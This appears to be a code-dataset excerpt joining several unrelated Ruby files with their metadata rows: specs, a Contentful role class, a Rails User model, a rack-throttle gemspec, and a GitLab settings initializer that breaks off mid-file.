describe "opendata_app_categories", type: :feature, dbscope: :example do
let(:site) { cms_site }
let(:node) { create_once :opendata_node_app_category, name: "opendata_app_categories" }
let(:index_path) { opendata_app_categories_path site, node }
context "app_categories" do
before { login_cms_user }
it "#index" do
visit index_path
expect(current_path).not_to eq sns_login_path
end
end
end
| 25 | 89 | 0.726667 |
1cb84d2de8d596cdf3e493e1dbf3bdc080b1cbe1 | 719 | require 'test_helper'
# Unit tests for the Liquid drop wrapping a LineItem: each reader on the
# drop should mirror the underlying model attribute.
class Liquid::Drops::LineItemDropTest < ActiveSupport::TestCase
  include Liquid
  def setup
    @line_item = FactoryBot.build(:line_item)
    @drop = Drops::LineItem.new(@line_item)
  end
  should "return name" do
    @line_item.name = 'foo'
    assert_equal(@line_item.name, @drop.name)
  end
  should "return description" do
    @line_item.description = 'description foo'
    assert_equal(@line_item.description, @drop.description)
  end
  should "return quantity" do
    @line_item.quantity = 5
    assert_equal(@line_item.quantity, @drop.quantity)
  end
  # Money is rendered as a plain two-decimal string without a currency symbol.
  should "return cost" do
    @line_item.cost = ThreeScale::Money.new(245, 'EUR')
    assert_equal('245.00', @drop.cost)
  end
end
| 22.46875 | 63 | 0.703755 |
0823bf7952db398bcf052eb015721de346508759 | 1,802 | require_relative 'resource'
module Contentful
  module Management
    # Resource class for Role.
    class Role
      include Contentful::Management::Resource
      include Contentful::Management::Resource::Refresher
      include Contentful::Management::Resource::SystemProperties
      property :name, :string
      property :policies, :array
      property :description, :string
      property :permissions, :hash
      # @private
      # Builds the creation payload. All four fields are required:
      # Hash#fetch raises KeyError when one is missing.
      def self.create_attributes(_client, attributes)
        {
          'name' => attributes.fetch(:name),
          'description' => attributes.fetch(:description),
          'permissions' => attributes.fetch(:permissions),
          'policies' => attributes.fetch(:policies)
        }
      end
      # Creates a role.
      #
      # @param [Contentful::Management::Client] client
      # @param [String] space_id
      # @param [Hash] attributes
      #
      # @return [Contentful::Management::Role]
      def self.create(client, space_id, attributes = {})
        super(client, space_id, nil, attributes)
      end
      # Finds a role by ID.
      #
      # @param [Contentful::Management::Client] client
      # @param [String] space_id
      # @param [String] role_id
      #
      # @return [Contentful::Management::Role]
      def self.find(client, space_id, role_id)
        super(client, space_id, nil, role_id)
      end
      protected
      # Update payload: the role's current values overridden by the
      # caller-supplied attributes (keys symbolized before merging).
      def query_attributes(attributes)
        {
          name: name,
          description: description,
          permissions: permissions,
          policies: policies
        }.merge(
          attributes.each_with_object({}) { |(k, v), result| result[k.to_sym] = v }
        )
      end
      # @private
      # Re-fetches this role from the API for Resource::Refresher.
      def refresh_find
        self.class.find(client, space.id, id)
      end
    end
  end
end
| 26.5 | 83 | 0.597114 |
# Make ./lib requirable, then load the library under test.
$LOAD_PATH << 'lib'
require 'rubyrdf'
| 10 | 17 | 0.566667 |
3343782d933e45f31e759ad81541f3edc54b59a5 | 3,459 | class User < ApplicationRecord
has_many :microposts, dependent: :destroy
has_many :active_relationships, class_name: "Relationship",
foreign_key: "follower_id",
dependent: :destroy
has_many :passive_relationships, class_name: "Relationship",
foreign_key: "followed_id",
dependent: :destroy
has_many :following, through: :active_relationships, source: :followed
has_many :followers, through: :passive_relationships, source: :follower
attr_accessor :remember_token, :activation_token, :reset_token
before_save :downcase_email
before_create :create_activation_digest
validates :name, presence: true, length: { maximum: 50 }
VALID_EMAIL_REGEX = /\A[\w+\-.]+@[a-z\d\-]+(\.[a-z\d\-]+)*\.[a-z]+\z/i
validates :email, presence: true, length: { maximum: 255 },
format: { with: VALID_EMAIL_REGEX },
uniqueness: {case_sensitive: false}
has_secure_password
validates :password, presence: true, length: { minimum: 6 }, allow_nil: true
# 渡された文字列のハッシュ値を返す
def self.digest(string)
cost = ActiveModel::SecurePassword.min_cost ? BCrypt::Engine::MIN_COST : BCrypt::Engine.cost
BCrypt::Password.create(string, cost: cost)
end
# ランダムなトークンを返す
def self.new_token
SecureRandom.urlsafe_base64
end
# 永続セッションのためにユーザをデータベースに記憶する
def remember
self.remember_token = User.new_token
update_attribute(:remember_digest, User.digest(remember_token))
end
# トークンがダイジェストと一致したらtrueを返す
def authenticated?(attribute, token)
digest = send("#{attribute}_digest")
return false if digest.nil?
BCrypt::Password.new(digest).is_password?(token)
end
# ユーザーのログイン情報を破棄する
def forget
update_attribute(:remember_digest, nil)
end
# アカウントを有効にする
def activate
update_columns(activated: true, activated_at: Time.zone.now)
end
# 有効化用のメールを送信する
def send_activation_email
UserMailer.account_activation(self).deliver_now
end
# パスワード再設定の属性を設定する
def create_reset_digest
self.reset_token = User.new_token
# update_attribute(:reset_digest, User.digest(reset_token))
# update_attribute(:reset_sent_at, Time.zone.now)
update_columns(reset_digest: User.digest(reset_token), reset_sent_at: Time.zone.now)
end
# パスワードの再設定メールを送信する
def send_password_reset_email
UserMailer.password_reset(self).deliver_now
end
# パスワード再設定の期限が切れている場合はtrueを返す
def password_reset_expired?
reset_sent_at < 2.hours.ago
end
# ユーザーのステータスフィードを返す
def feed
following_ids = "SELECT followed_id FROM relationships
WHERE follower_id = :user_id"
Micropost.where("user_id IN (#{following_ids})
OR user_id = :user_id", user_id: id)
end
# ユーザーをフォローする
def follow(other_user)
active_relationships.create(followed_id: other_user.id)
end
# ユーザーをフォロー解除する
def unfollow(other_user)
active_relationships.find_by(followed_id: other_user.id).destroy
end
# 現在のユーザーがフォローしていたらtrueを返す
def following?(other_user)
following.include?(other_user)
end
private
# メールアドレスをすべて小文字にする
def downcase_email
self.email = email.downcase
end
# 有効化トークンとダイジェストを作成及び代入する
def create_activation_digest
self.activation_token = User.new_token
self.activation_digest = User.digest(activation_token)
end
end
| 30.342105 | 96 | 0.696155 |
e20a3b8ed0b9d0adaf0f92a333c6c72933297394 | 2,852 | require 'spec_helper'
require 'phraseapp-in-context-editor-ruby'
require 'phraseapp-in-context-editor-ruby/displayable_key_identifier'
require 'phraseapp-in-context-editor-ruby/fallback_keys_fetcher'
describe PhraseApp::InContextEditor::DisplayableKeyIdentifier do
let(:identifier) { PhraseApp::InContextEditor::DisplayableKeyIdentifier.new(PhraseApp::InContextEditor::ApiWrapper.new) }
describe "#identify(key_name, options)" do
let(:key) { "foo.main" }
let(:options) { {} }
let(:keys) { [] }
subject{ identifier.identify(key, options)}
before(:each) do
allow(PhraseApp::InContextEditor::FallbackKeysFetcher).to receive(:extract_fallback_keys).with(key, options).and_return(["foo.fallback1", "foo.fallback2"])
allow(identifier).to receive(:find_keys_within_phraseapp).and_return(keys)
end
context "standard key can be found via phrase service" do
let(:keys) { ["foo.main"] }
it{ is_expected.to eq "foo.main" }
end
context "standard key cannot be found but first fallback is available" do
let(:keys) { ["foo.fallback1", "foo.fallback2"] }
it { is_expected.to eq "foo.fallback1" }
end
context "standard key cannot be found but second fallback is available" do
let(:keys) { ["foo.fallback2"] }
it { is_expected.to eq "foo.fallback2" }
end
context "no key can be cound via phrase service" do
it { is_expected.to eq "foo.main" }
end
end
describe "#find_keys_within_phraseapp(key_names)" do
let(:key_names) { ["foo", "bar", "baz"] }
let(:keys_from_api) { [] }
let(:pre_cached) { [] }
let(:pre_fetched) { [] }
subject { identifier.send(:find_keys_within_phraseapp, key_names) }
before(:each) do
allow(identifier).to receive(:key_names_returned_from_api_for).and_return(keys_from_api)
allow(identifier.key_names_cache).to receive(:pre_cached).and_return(pre_cached)
allow(identifier.key_names_cache).to receive(:pre_fetched).and_return(pre_fetched)
end
it { is_expected.to be_an(Array) }
context "some keys are prefetched" do
let(:pre_fetched) { ["foo", "bar"] }
let(:pre_cached) { ["foo"] }
context "api returns additional results" do
let(:keys_from_api) { ["baz"] }
it { is_expected.to eq ["foo", "baz"] }
end
context "api returns no results" do
let(:keys_from_api) { [] }
it { is_expected.to eq ["foo"] }
end
end
context "no keys are prefetched" do
let(:pre_fetched) { [] }
let(:pre_cached) { [] }
context "api returns results" do
let(:keys_from_api) { ["baz"] }
it { is_expected.to eq ["baz"] }
end
context "api returns no results" do
let(:keys_from_api) { [] }
it { is_expected.to eq [] }
end
end
end
end | 29.402062 | 161 | 0.652174 |
91e6f00195d1eb8a6d4e574d9fb8f984665e20d6 | 1,559 | #!/usr/bin/env ruby -rubygems
# -*- encoding: utf-8 -*-
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
# Gem specification for rack-throttle. Version and release date are derived
# from the VERSION file at build time.
Gem::Specification.new do |gem|
  gem.version            = File.read('VERSION').chomp
  # NOTE(review): deriving the date from the file mtime makes builds
  # non-reproducible; confirm whether a fixed date is preferable.
  gem.date               = File.mtime('VERSION').strftime('%Y-%m-%d')
  gem.name               = 'rack-throttle'
  gem.homepage           = 'https://github.com/bendiken/rack-throttle'
  gem.license            = 'Public Domain' if gem.respond_to?(:license=)
  gem.summary            = 'HTTP request rate limiter for Rack applications.'
  gem.description        = 'Rack middleware for rate-limiting incoming HTTP requests.'
  gem.authors            = ['Arto Bendiken']
  gem.email              = '[email protected]'
  gem.platform           = Gem::Platform::RUBY
  gem.files              = %w(AUTHORS README UNLICENSE VERSION) + Dir.glob('lib/**/*.rb')
  gem.bindir             = %q(bin)
  gem.executables        = %w()
  gem.require_paths      = %w(lib)
  gem.extensions         = %w()
  gem.test_files         = %w()
  # Removed deprecated attributes: `default_executable=` was removed from
  # RubyGems and `has_rdoc=` is an ignored no-op that only emits warnings.
  gem.required_ruby_version      = '>= 1.8.2'
  gem.requirements               = []
  gem.add_runtime_dependency     'bundler', '>= 1.0.0'
  gem.add_development_dependency 'rack-test'
  gem.add_development_dependency 'rspec'
  gem.add_development_dependency 'yard'
  gem.add_development_dependency 'timecop'
  gem.add_runtime_dependency     'rack', '>= 1.0.0'
  gem.post_install_message       = nil
end
| 36.255814 | 89 | 0.607441 |
abaabad5d65fac35e22907aa9ad536ce222f7491 | 24,903 | # rubocop:disable GitlabSecurity/PublicSend
require_dependency Rails.root.join('lib/gitlab') # Load Gitlab as soon as possible
# Application settings loaded from gitlab.yml (or GITLAB_CONFIG), namespaced
# by Rails environment. The helpers below build derived URLs and validate
# constant-based options.
class Settings < Settingslogic
  source ENV.fetch('GITLAB_CONFIG') { "#{Rails.root}/config/gitlab.yml" }
  namespace Rails.env
  class << self
    def gitlab_on_standard_port?
      on_standard_port?(gitlab)
    end
    # Strips a leading "www." from the host part of +url+.
    def host_without_www(url)
      host(url).sub('www.', '')
    end
    # Builds the full CI root URL, omitting the port when it is the
    # protocol's standard one.
    def build_gitlab_ci_url
      custom_port =
        if on_standard_port?(gitlab)
          nil
        else
          ":#{gitlab.port}"
        end
      [
        gitlab.protocol,
        "://",
        gitlab.host,
        custom_port,
        gitlab.relative_url_root
      ].join('')
    end
    def build_pages_url
      base_url(pages).join('')
    end
    # Builds the SSH clone prefix. Uses ssh:// URL syntax for non-standard
    # ports; otherwise scp-style "user@host:" (hosts containing ':', e.g.
    # IPv6 literals, are bracketed).
    def build_gitlab_shell_ssh_path_prefix
      user_host = "#{gitlab_shell.ssh_user}@#{gitlab_shell.ssh_host}"
      if gitlab_shell.ssh_port != 22
        "ssh://#{user_host}:#{gitlab_shell.ssh_port}/"
      else
        if gitlab_shell.ssh_host.include? ':'
          "[#{user_host}]:"
        else
          "#{user_host}:"
        end
      end
    end
    def build_base_gitlab_url
      base_url(gitlab).join('')
    end
    def build_gitlab_url
      (base_url(gitlab) + [gitlab.relative_url_root]).join('')
    end
    # Check that each value in `current` (strings or integers) is a constant
    # of `modul`; unknown values are dropped. Returns `default` (or []) when
    # `current` is nil.
    def verify_constant_array(modul, current, default)
      values = default || []
      unless current.nil?
        values = []
        current.each do |constant|
          values.push(verify_constant(modul, constant, nil))
        end
        values.delete_if { |value| value.nil? }
      end
      values
    end
    # Check that `current` (string or integer) is a constant of `modul`,
    # returning `default` when it is not.
    def verify_constant(modul, current, default)
      constant = modul.constants.find { |name| modul.const_get(name) == current }
      value = constant.nil? ? default : modul.const_get(constant)
      if current.is_a? String
        # NOTE(review): the inline rescue swallows any error from const_get
        # (not just NameError) and silently falls back to the default.
        value = modul.const_get(current.upcase) rescue default
      end
      value
    end
    # Expands +path+ relative to the Rails root.
    def absolute(path)
      File.expand_path(path, Rails.root)
    end
    private
    # Returns [protocol, "://", host, port] pieces for joining into a URL;
    # the port piece is nil on the protocol's standard port.
    def base_url(config)
      custom_port = on_standard_port?(config) ? nil : ":#{config.port}"
      [
        config.protocol,
        "://",
        config.host,
        custom_port
      ]
    end
    def on_standard_port?(config)
      config.port.to_i == (config.https ? 443 : 80)
    end
    # Extract the host part of the given +url+.
    def host(url)
      url = url.downcase
      url = "http://#{url}" unless url.start_with?('http')
      # Get rid of the path so that we don't even have to encode it
      url_without_path = url.sub(%r{(https?://[^\/]+)/?.*}, '\1')
      URI.parse(url_without_path).host
    end
    # Random cron time every Sunday to load balance usage pings
    def cron_random_weekly_time
      hour = rand(24)
      minute = rand(60)
      "#{minute} #{hour} * * 0"
    end
  end
end
# Default settings
Settings['ldap'] ||= Settingslogic.new({})
Settings.ldap['enabled'] = false if Settings.ldap['enabled'].nil?
# backwards compatibility, we only have one host
if Settings.ldap['enabled'] || Rails.env.test?
  if Settings.ldap['host'].present?
    # We detected old LDAP configuration syntax. Update the config to make it
    # look like it was entered with the new syntax.
    server = Settings.ldap.except('sync_time')
    Settings.ldap['servers'] = {
      'main' => server
    }
  end
  # Normalize every configured server: fill defaults, derive the OmniAuth
  # provider name/class, and map legacy encryption aliases.
  Settings.ldap['servers'].each do |key, server|
    server = Settingslogic.new(server)
    server['label'] ||= 'LDAP'
    server['timeout'] ||= 10.seconds
    server['block_auto_created_users'] = false if server['block_auto_created_users'].nil?
    server['allow_username_or_email_login'] = false if server['allow_username_or_email_login'].nil?
    server['active_directory'] = true if server['active_directory'].nil?
    server['attributes'] = {} if server['attributes'].nil?
    server['provider_name'] ||= "ldap#{key}".downcase
    server['provider_class'] = OmniAuth::Utils.camelize(server['provider_name'])
    # For backwards compatibility
    server['encryption'] ||= server['method']
    server['encryption'] = 'simple_tls' if server['encryption'] == 'ssl'
    server['encryption'] = 'start_tls' if server['encryption'] == 'tls'
    # Certificates are not verified for backwards compatibility.
    # This default should be flipped to true in 9.5.
    if server['verify_certificates'].nil?
      server['verify_certificates'] = false
      message = <<-MSG.strip_heredoc
        LDAP SSL certificate verification is disabled for backwards-compatibility.
        Please add the "verify_certificates" option to gitlab.yml for each LDAP
        server. Certificate verification will be enabled by default in GitLab 9.5.
      MSG
      Rails.logger.warn(message)
    end
    Settings.ldap['servers'][key] = server
  end
end
Settings['omniauth'] ||= Settingslogic.new({})
Settings.omniauth['enabled'] = false if Settings.omniauth['enabled'].nil?
Settings.omniauth['auto_sign_in_with_provider'] = false if Settings.omniauth['auto_sign_in_with_provider'].nil?
Settings.omniauth['allow_single_sign_on'] = false if Settings.omniauth['allow_single_sign_on'].nil?
Settings.omniauth['external_providers'] = [] if Settings.omniauth['external_providers'].nil?
Settings.omniauth['block_auto_created_users'] = true if Settings.omniauth['block_auto_created_users'].nil?
Settings.omniauth['auto_link_ldap_user'] = false if Settings.omniauth['auto_link_ldap_user'].nil?
Settings.omniauth['auto_link_saml_user'] = false if Settings.omniauth['auto_link_saml_user'].nil?
Settings.omniauth['sync_email_from_provider'] ||= nil
Settings.omniauth['providers'] ||= []
Settings.omniauth['cas3'] ||= Settingslogic.new({})
Settings.omniauth.cas3['session_duration'] ||= 8.hours
Settings.omniauth['session_tickets'] ||= Settingslogic.new({})
# NOTE(review): plain `=` (not `||=`) — this always overrides any configured
# value; presumably intentional since the CAS3 ticket key is fixed. Confirm.
Settings.omniauth.session_tickets['cas3'] = 'ticket'
# Fill out omniauth-gitlab settings. It is needed for easy set up GHE or GH by just specifying url.
github_default_url = "https://github.com"
github_settings = Settings.omniauth['providers'].find { |provider| provider["name"] == "github" }
if github_settings
  # For compatibility with old config files (before 7.8)
  # where people dont have url in github settings
  if github_settings['url'].blank?
    github_settings['url'] = github_default_url
  end
  github_settings["args"] ||= Settingslogic.new({})
  # github.com uses the library defaults; GitHub Enterprise instances get
  # their endpoints derived from the configured base URL.
  github_settings["args"]["client_options"] =
    if github_settings["url"].include?(github_default_url)
      OmniAuth::Strategies::GitHub.default_options[:client_options]
    else
      {
        "site" => File.join(github_settings["url"], "api/v3"),
        "authorize_url" => File.join(github_settings["url"], "login/oauth/authorize"),
        "token_url" => File.join(github_settings["url"], "login/oauth/access_token")
      }
    end
end
Settings['shared'] ||= Settingslogic.new({})
Settings.shared['path'] = Settings.absolute(Settings.shared['path'] || "shared")
Settings['issues_tracker'] ||= {}
#
# GitLab
#
Settings['gitlab'] ||= Settingslogic.new({})
Settings.gitlab['default_projects_limit'] ||= 100000
Settings.gitlab['default_branch_protection'] ||= 2
Settings.gitlab['default_can_create_group'] = true if Settings.gitlab['default_can_create_group'].nil?
Settings.gitlab['host'] ||= ENV['GITLAB_HOST'] || 'localhost'
Settings.gitlab['ssh_host'] ||= Settings.gitlab.host
Settings.gitlab['https'] = false if Settings.gitlab['https'].nil?
Settings.gitlab['port'] ||= ENV['GITLAB_PORT'] || (Settings.gitlab.https ? 443 : 80)
Settings.gitlab['relative_url_root'] ||= ENV['RAILS_RELATIVE_URL_ROOT'] || ''
Settings.gitlab['protocol'] ||= Settings.gitlab.https ? "https" : "http"
Settings.gitlab['email_enabled'] ||= true if Settings.gitlab['email_enabled'].nil?
Settings.gitlab['email_from'] ||= ENV['GITLAB_EMAIL_FROM'] || "gitlab@#{Settings.gitlab.host}"
Settings.gitlab['email_display_name'] ||= ENV['GITLAB_EMAIL_DISPLAY_NAME'] || 'GitLab'
Settings.gitlab['email_reply_to'] ||= ENV['GITLAB_EMAIL_REPLY_TO'] || "noreply@#{Settings.gitlab.host}"
Settings.gitlab['email_subject_suffix'] ||= ENV['GITLAB_EMAIL_SUBJECT_SUFFIX'] || ""
# __send__ is used because the URL builders live behind `private` on the
# Settings singleton (see the class above).
Settings.gitlab['base_url'] ||= Settings.__send__(:build_base_gitlab_url)
Settings.gitlab['url'] ||= Settings.__send__(:build_gitlab_url)
Settings.gitlab['user'] ||= 'git'
Settings.gitlab['user_home'] ||= begin
  Etc.getpwnam(Settings.gitlab['user']).dir
rescue ArgumentError # no user configured
  '/home/' + Settings.gitlab['user']
end
Settings.gitlab['time_zone'] ||= nil
Settings.gitlab['signup_enabled'] ||= true if Settings.gitlab['signup_enabled'].nil?
Settings.gitlab['password_authentication_enabled'] ||= true if Settings.gitlab['password_authentication_enabled'].nil?
Settings.gitlab['restricted_visibility_levels'] = Settings.__send__(:verify_constant_array, Gitlab::VisibilityLevel, Settings.gitlab['restricted_visibility_levels'], [])
Settings.gitlab['username_changing_enabled'] = true if Settings.gitlab['username_changing_enabled'].nil?
Settings.gitlab['issue_closing_pattern'] = '((?:[Cc]los(?:e[sd]?|ing)|[Ff]ix(?:e[sd]|ing)?|[Rr]esolv(?:e[sd]?|ing))(:?) +(?:(?:issues? +)?%{issue_ref}(?:(?:, *| +and +)?)|([A-Z][A-Z0-9_]+-\d+))+)' if Settings.gitlab['issue_closing_pattern'].nil?
Settings.gitlab['default_projects_features'] ||= {}
Settings.gitlab['webhook_timeout'] ||= 10
Settings.gitlab['max_attachment_size'] ||= 10
Settings.gitlab['session_expire_delay'] ||= 10080
Settings.gitlab.default_projects_features['issues'] = true if Settings.gitlab.default_projects_features['issues'].nil?
Settings.gitlab.default_projects_features['merge_requests'] = true if Settings.gitlab.default_projects_features['merge_requests'].nil?
Settings.gitlab.default_projects_features['wiki'] = true if Settings.gitlab.default_projects_features['wiki'].nil?
Settings.gitlab.default_projects_features['snippets'] = true if Settings.gitlab.default_projects_features['snippets'].nil?
Settings.gitlab.default_projects_features['builds'] = true if Settings.gitlab.default_projects_features['builds'].nil?
Settings.gitlab.default_projects_features['container_registry'] = true if Settings.gitlab.default_projects_features['container_registry'].nil?
Settings.gitlab.default_projects_features['visibility_level'] = Settings.__send__(:verify_constant, Gitlab::VisibilityLevel, Settings.gitlab.default_projects_features['visibility_level'], Gitlab::VisibilityLevel::PRIVATE)
Settings.gitlab['domain_whitelist'] ||= []
Settings.gitlab['import_sources'] ||= %w[github bitbucket gitlab google_code fogbugz git gitlab_project gitea]
Settings.gitlab['trusted_proxies'] ||= []
Settings.gitlab['no_todos_messages'] ||= YAML.load_file(Rails.root.join('config', 'no_todos_messages.yml'))
Settings.gitlab['usage_ping_enabled'] = true if Settings.gitlab['usage_ping_enabled'].nil?
#
# CI
#
Settings['gitlab_ci'] ||= Settingslogic.new({})
Settings.gitlab_ci['shared_runners_enabled'] = true if Settings.gitlab_ci['shared_runners_enabled'].nil?
Settings.gitlab_ci['all_broken_builds'] = true if Settings.gitlab_ci['all_broken_builds'].nil?
Settings.gitlab_ci['add_pusher'] = false if Settings.gitlab_ci['add_pusher'].nil?
Settings.gitlab_ci['builds_path'] = Settings.absolute(Settings.gitlab_ci['builds_path'] || "builds/")
Settings.gitlab_ci['url'] ||= Settings.__send__(:build_gitlab_ci_url)
#
# Reply by email
#
Settings['incoming_email'] ||= Settingslogic.new({})
Settings.incoming_email['enabled'] = false if Settings.incoming_email['enabled'].nil?
#
# Build Artifacts
#
Settings['artifacts'] ||= Settingslogic.new({})
Settings.artifacts['enabled'] = true if Settings.artifacts['enabled'].nil?
Settings.artifacts['path'] = Settings.absolute(Settings.artifacts['path'] || File.join(Settings.shared['path'], "artifacts"))
Settings.artifacts['max_size'] ||= 100 # in megabytes
#
# Registry
#
# NOTE(review): the `||= nil` lines never change a value — they only document
# the available configuration keys.
Settings['registry'] ||= Settingslogic.new({})
Settings.registry['enabled'] ||= false
Settings.registry['host'] ||= "example.com"
Settings.registry['port'] ||= nil
Settings.registry['api_url'] ||= "http://localhost:5000/"
Settings.registry['key'] ||= nil
Settings.registry['issuer'] ||= nil
Settings.registry['host_port'] ||= [Settings.registry['host'], Settings.registry['port']].compact.join(':')
Settings.registry['path'] = Settings.absolute(Settings.registry['path'] || File.join(Settings.shared['path'], 'registry'))
#
# Pages
#
Settings['pages'] ||= Settingslogic.new({})
Settings.pages['enabled'] = false if Settings.pages['enabled'].nil?
Settings.pages['path'] = Settings.absolute(Settings.pages['path'] || File.join(Settings.shared['path'], "pages"))
Settings.pages['https'] = false if Settings.pages['https'].nil?
Settings.pages['host'] ||= "example.com"
Settings.pages['port'] ||= Settings.pages.https ? 443 : 80
Settings.pages['protocol'] ||= Settings.pages.https ? "https" : "http"
Settings.pages['url'] ||= Settings.__send__(:build_pages_url)
Settings.pages['external_http'] ||= false unless Settings.pages['external_http'].present?
Settings.pages['external_https'] ||= false unless Settings.pages['external_https'].present?
#
# Git LFS
#
Settings['lfs'] ||= Settingslogic.new({})
Settings.lfs['enabled'] = true if Settings.lfs['enabled'].nil?
Settings.lfs['storage_path'] = Settings.absolute(Settings.lfs['storage_path'] || File.join(Settings.shared['path'], "lfs-objects"))
#
# Mattermost
#
Settings['mattermost'] ||= Settingslogic.new({})
Settings.mattermost['enabled'] = false if Settings.mattermost['enabled'].nil?
Settings.mattermost['host'] = nil unless Settings.mattermost.enabled
#
# Gravatar
#
Settings['gravatar'] ||= Settingslogic.new({})
Settings.gravatar['enabled'] = true if Settings.gravatar['enabled'].nil?
Settings.gravatar['plain_url'] ||= 'http://www.gravatar.com/avatar/%{hash}?s=%{size}&d=identicon'
Settings.gravatar['ssl_url'] ||= 'https://secure.gravatar.com/avatar/%{hash}?s=%{size}&d=identicon'
Settings.gravatar['host'] = Settings.host_without_www(Settings.gravatar['plain_url'])
#
# Cron Jobs
#
Settings['cron_jobs'] ||= Settingslogic.new({})
Settings.cron_jobs['stuck_ci_jobs_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['stuck_ci_jobs_worker']['cron'] ||= '0 * * * *'
Settings.cron_jobs['stuck_ci_jobs_worker']['job_class'] = 'StuckCiJobsWorker'
Settings.cron_jobs['pipeline_schedule_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['pipeline_schedule_worker']['cron'] ||= '19 * * * *'
Settings.cron_jobs['pipeline_schedule_worker']['job_class'] = 'PipelineScheduleWorker'
Settings.cron_jobs['expire_build_artifacts_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['expire_build_artifacts_worker']['cron'] ||= '50 * * * *'
Settings.cron_jobs['expire_build_artifacts_worker']['job_class'] = 'ExpireBuildArtifactsWorker'
Settings.cron_jobs['repository_check_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['repository_check_worker']['cron'] ||= '20 * * * *'
Settings.cron_jobs['repository_check_worker']['job_class'] = 'RepositoryCheck::BatchWorker'
Settings.cron_jobs['admin_email_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['admin_email_worker']['cron'] ||= '0 0 * * 0'
Settings.cron_jobs['admin_email_worker']['job_class'] = 'AdminEmailWorker'
Settings.cron_jobs['repository_archive_cache_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['repository_archive_cache_worker']['cron'] ||= '0 * * * *'
Settings.cron_jobs['repository_archive_cache_worker']['job_class'] = 'RepositoryArchiveCacheWorker'
Settings.cron_jobs['import_export_project_cleanup_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['import_export_project_cleanup_worker']['cron'] ||= '0 * * * *'
Settings.cron_jobs['import_export_project_cleanup_worker']['job_class'] = 'ImportExportProjectCleanupWorker'
Settings.cron_jobs['requests_profiles_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['requests_profiles_worker']['cron'] ||= '0 0 * * *'
Settings.cron_jobs['requests_profiles_worker']['job_class'] = 'RequestsProfilesWorker'
Settings.cron_jobs['remove_expired_members_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['remove_expired_members_worker']['cron'] ||= '10 0 * * *'
Settings.cron_jobs['remove_expired_members_worker']['job_class'] = 'RemoveExpiredMembersWorker'
Settings.cron_jobs['remove_expired_group_links_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['remove_expired_group_links_worker']['cron'] ||= '10 0 * * *'
Settings.cron_jobs['remove_expired_group_links_worker']['job_class'] = 'RemoveExpiredGroupLinksWorker'
Settings.cron_jobs['prune_old_events_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['prune_old_events_worker']['cron'] ||= '0 */6 * * *'
Settings.cron_jobs['prune_old_events_worker']['job_class'] = 'PruneOldEventsWorker'
Settings.cron_jobs['trending_projects_worker'] ||= Settingslogic.new({})
# NOTE(review): unlike every sibling, this cron uses plain `=` and therefore
# always overrides a user-configured schedule — looks unintentional; confirm.
Settings.cron_jobs['trending_projects_worker']['cron'] = '0 1 * * *'
Settings.cron_jobs['trending_projects_worker']['job_class'] = 'TrendingProjectsWorker'
Settings.cron_jobs['remove_unreferenced_lfs_objects_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['remove_unreferenced_lfs_objects_worker']['cron'] ||= '20 0 * * *'
Settings.cron_jobs['remove_unreferenced_lfs_objects_worker']['job_class'] = 'RemoveUnreferencedLfsObjectsWorker'
Settings.cron_jobs['stuck_import_jobs_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['stuck_import_jobs_worker']['cron'] ||= '15 * * * *'
Settings.cron_jobs['stuck_import_jobs_worker']['job_class'] = 'StuckImportJobsWorker'
Settings.cron_jobs['gitlab_usage_ping_worker'] ||= Settingslogic.new({})
# Randomized weekly slot to load-balance usage pings across installations.
Settings.cron_jobs['gitlab_usage_ping_worker']['cron'] ||= Settings.__send__(:cron_random_weekly_time)
Settings.cron_jobs['gitlab_usage_ping_worker']['job_class'] = 'GitlabUsagePingWorker'
Settings.cron_jobs['schedule_update_user_activity_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['schedule_update_user_activity_worker']['cron'] ||= '30 0 * * *'
Settings.cron_jobs['schedule_update_user_activity_worker']['job_class'] = 'ScheduleUpdateUserActivityWorker'
Settings.cron_jobs['remove_old_web_hook_logs_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['remove_old_web_hook_logs_worker']['cron'] ||= '40 0 * * *'
Settings.cron_jobs['remove_old_web_hook_logs_worker']['job_class'] = 'RemoveOldWebHookLogsWorker'
Settings.cron_jobs['stuck_merge_jobs_worker'] ||= Settingslogic.new({})
Settings.cron_jobs['stuck_merge_jobs_worker']['cron'] ||= '0 */2 * * *'
Settings.cron_jobs['stuck_merge_jobs_worker']['job_class'] = 'StuckMergeJobsWorker'
#
# GitLab Shell
#
Settings['gitlab_shell'] ||= Settingslogic.new({})
Settings.gitlab_shell['path'] = Settings.absolute(Settings.gitlab_shell['path'] || Settings.gitlab['user_home'] + '/gitlab-shell/')
Settings.gitlab_shell['hooks_path'] = Settings.absolute(Settings.gitlab_shell['hooks_path'] || Settings.gitlab['user_home'] + '/gitlab-shell/hooks/')
Settings.gitlab_shell['secret_file'] ||= Rails.root.join('.gitlab_shell_secret')
Settings.gitlab_shell['receive_pack'] = true if Settings.gitlab_shell['receive_pack'].nil?
Settings.gitlab_shell['upload_pack'] = true if Settings.gitlab_shell['upload_pack'].nil?
Settings.gitlab_shell['ssh_host'] ||= Settings.gitlab.ssh_host
Settings.gitlab_shell['ssh_port'] ||= 22
Settings.gitlab_shell['ssh_user'] ||= Settings.gitlab.user
Settings.gitlab_shell['owner_group'] ||= Settings.gitlab.user
Settings.gitlab_shell['ssh_path_prefix'] ||= Settings.__send__(:build_gitlab_shell_ssh_path_prefix)
Settings.gitlab_shell['git_timeout'] ||= 800
#
# Workhorse
#
Settings['workhorse'] ||= Settingslogic.new({})
Settings.workhorse['secret_file'] ||= Rails.root.join('.gitlab_workhorse_secret')
#
# Repositories
#
Settings['repositories'] ||= Settingslogic.new({})
Settings.repositories['storages'] ||= {}
unless Settings.repositories.storages['default']
  Settings.repositories.storages['default'] ||= {}
  # We set the path only if the default storage doesn't exist, in case it exists
